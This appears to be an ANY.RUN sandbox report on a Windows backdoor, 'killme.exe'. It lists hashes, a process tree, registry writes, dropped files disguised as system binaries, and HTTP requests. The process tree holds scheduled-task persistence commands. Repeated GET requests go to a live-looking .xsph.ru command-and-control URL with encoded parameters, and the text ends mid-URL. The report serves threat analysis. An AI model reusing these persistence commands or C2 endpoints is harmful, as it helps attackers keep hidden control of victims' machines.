| File name: | killme.exe |
| Full analysis: | https://app.any.run/tasks/c3b109a5-f77c-43e7-9175-fbdb1b9d02ed |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | February 04, 2024, 21:54:36 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 2418ADEC64F6FB4773A7CA17334E0CEA |
| SHA1: | 18799F2AFC98D8C8ACF4D42C79C24D1E4C188C99 |
| SHA256: | EE3E8DD4413A12E94C123352F5A86E9F242034E97DA7D2220A3E13717BEA9573 |
| SSDEEP: | 98304:ZFrKdQH2wExUSweoviQ/F+mrpV0yLm5UZ9aXBHbJDCL8xTHRX46wxbZSS:Z3J |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:12:01 19:00:55+01:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 201216 |
| InitializedDataSize: | 114176 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1ec40 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 292 | schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 7 /tr "'C:\Windows\tracing\PowerTracker\ctfmon.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 668 | "C:\Windows\System32\WScript.exe" "C:\ComponentInto\YivvWAxakNEliEHH3Chl.vbe" | C:\Windows\System32\wscript.exe | — | killme.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1028 | "C:\ComponentInto\BlockRuntime.exe" | C:\ComponentInto\BlockRuntime.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 1192 | schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\dwm.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1196 | schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1220 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\FileZilla FTP Client\locales\gl_ES\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1504 | "C:\Users\admin\AppData\Local\Temp\killme.exe" | C:\Users\admin\AppData\Local\Temp\killme.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
| 1644 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\e4484f85-ccfa-4582-a2cb-d81e44f8c8c7.vbs" | C:\Windows\System32\wscript.exe | — | spoolsv.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2036 | schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\ComponentInto\spoolsv.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2088 | "C:\Users\admin\AppData\Local\Temp\killme.exe" | C:\Users\admin\AppData\Local\Temp\killme.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| (PID) Process: | (2088) killme.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2088) killme.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2088) killme.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2088) killme.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (668) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (668) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (668) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (668) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (1028) BlockRuntime.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1028) BlockRuntime.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2088 | killme.exe | C:\ComponentInto\YivvWAxakNEliEHH3Chl.vbe | binary | |
MD5:CFF23C6E94F975EA783D5C213AFF20B5 | SHA256:470667FB84FA164A2BFA2252C55CAD2ADB743419783CB1BA95243A7E5D3784C1 | |||
| 2088 | killme.exe | C:\ComponentInto\BlockRuntime.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\ComponentInto\spoolsv.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\csrss.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\Windows\twain_32\services.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\Windows\twain_32\c5b4cb5e9653cc | text | |
MD5:D26CD65C016349346BD1CD3AF990BF01 | SHA256:F741673152B835AD9A71821E8131F1288021B88593C4F1A4F2BA68CA55FAB40B | |||
| 2088 | killme.exe | C:\ComponentInto\fKvreLYM2iz56SdUSiGtLt1hjDL1.bat | text | |
MD5:F635875C9CDF4DD6B27224C42D350674 | SHA256:18D77343ECFE4533D06349844F6069B9A226A40BB2CC1894F1FA5BD4C4FA2838 | |||
| 1028 | BlockRuntime.exe | C:\Windows\Setup\State\wininit.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\Windows\Cursors\cmd.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
| 1028 | BlockRuntime.exe | C:\MSOCache\All Users\dwm.exe | executable | |
MD5:0275329A4428D706ABD70B8E2316AA31 | SHA256:F10E2AE9D117D56FFBDBED9023D421ECE5D404FFB85542126BA46940230E8F92 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&4ece83265ab76456ee6b0b2fa2a12baf=0VfiIiOiQGMxUWNjFGN1MjZ2IWNxQjZhRmMmJTNwQjY3MDNyMTMiwiI1cTN0UmY5YzY3EGZxUWZzIWOzgDO1gDZ1EjY3UjN5EmY1UDNiFDOkJiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W | unknown | text | 2.09 Kb | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&56541ae5ae0368bf133b99c77de7514f=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 | unknown | text | 2.09 Kb | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=0VfiIiOiQGMxUWNjFGN1MjZ2IWNxQjZhRmMmJTNwQjY3MDNyMTMiwiI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMisHL9JCMYZWaBRkT2ElaNZTQE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVlWT5lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKlXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpUeJl2TpFEVOBTRq5kMRpmT4tGRaBTTE1UaaJTTyk1RORTVE90aspXW4l1ROdXRXlVbaRlWxkFRPFTTql0cJl3Y0J0UPlXSp9UanR0TxkUbalXU61UaOdlW4NmaZpXSEp1aaRVWqJ1VNJTVHp1MVdkWtpkMZJTVH10MZdkTpJVbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEcNRUSuVzVhdnQYpFMOZUSwUERJNnVHpldxUUSyE0UlNHbXJGaaVUSwkFRl9WQpVWSkVUTzQTaNdWQFlkVCFTUnFERN